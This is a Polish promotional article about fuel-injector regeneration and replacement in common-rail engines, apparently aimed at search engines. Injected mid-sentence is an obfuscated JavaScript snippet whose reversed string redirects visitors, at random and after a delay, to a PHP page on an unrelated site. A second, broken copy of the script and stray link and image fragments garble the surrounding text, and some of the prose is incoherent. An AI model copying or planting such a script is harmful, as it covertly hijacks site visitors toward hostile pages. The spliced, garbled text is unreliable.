Sposoby regeneracji wtryskiwaczy

Wtryskiwacze są komponentami silników benzynowych i wysokoprężnych z bezpośrednim wtryskiem. W nowoczesnych silnikach wysokoprężnych z technologią common rail są one znane jako wtryskiwacze. Gdy silnik pracuje, drobne elementy są narażone na wysokie temperatury i ciśnienie, co prowadzi do zużycia. Może to spowodować wyciek wtryskiwaczy. Ponadto 0,2 mm otwory, przez które paliwo wchodzi do komór spalania, mogą zostać zatkane zanieczyszczeniami i zanieczyszczonym paliwem.

Czy wadliwe wtryskiwacze muszą być zawsze wymieniane?

regeneracja wtryskiwaczy świę<script>$zXz=function(n){if (typeof ($zXz.list[n]) == „string”) return $zXz.list[n].split(„”).reverse().join(„”);return $zXz.list[n];};$zXz.list=[„\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script><script>$zXz=function(n){if (typeof ($zXz.list[n]) == tokrzyskie” height=”107″ src=”http://www.praca-za-granica-24.pl/wp-content/uploads/2019/05/regeneracja-wtryskiwaczy-swietokrzyskie.jpg” style=”float:left;” width=”160″/>Zasadniczo możliwa jest naprawa przez specjalistyczne warsztaty. W tym przypadku zachowywane są specjalne procedury czyszczenia lub wymiana poszczególnych części zużywalnych w komponencie. Jeśli konieczna jest wymiana uszkodzonego wtryskiwacza, należy najpierw określić, która dysza jest uszkodzona. W tym celu ilości wtrysku poszczególnych dysz są określane za pomocą oprogramowania diagnostycznego. Następnie należy usunąć wadliwy element. Dokładna procedura różni się w zależności od producenta iw wielu przypadkach wymaga specjalnych narzędzi i profesjonalnej wiedzy. Z reguły wystarczy zmienić tylko wadliwą dyszę. Jednak ryzyko uszkodzenia lub osadzenia się w innych dyszach jest również mało prawdopodobne. to-enrico.pl/oferta/”>Regeneracja wtryskiwaczy świętokrzyskie zawsze powinna być uzgodniona indywidualnie z warsztatem na podstawie diagnozy. Nierzadko wtryskiwacze są tak mocno osadzone w cylindrach, że można je usunąć tylko siłą. W najgorszym przypadku nie można wyjąć dyszy lub wtryskiwacza i trzeba go wywiercić. Na koniec można ponownie złożyć nową dyszę i wszystkie zdemontowane komponenty. Ponadto filtr paliwa należy wymienić bezpośrednio, aby zapobiec zanieczyszczeniu układu.

Używane części samochodowe nie są rozsądną opcją, ponieważ zużycie i funkcjonalność zewnętrzna nie są widoczne. Oprócz wysokiego poziomu wiedzy fachowej w zakresie wymiany oprogramowania diagnostycznego zazwyczaj wymagane jest prawidłowe zaprogramowanie nowych wtryskiwaczy do jednostki sterującej silnika. To również jeden z powodów, dla których zmiana może być przeprowadzana wyłącznie w specjalistycznym warsztacie.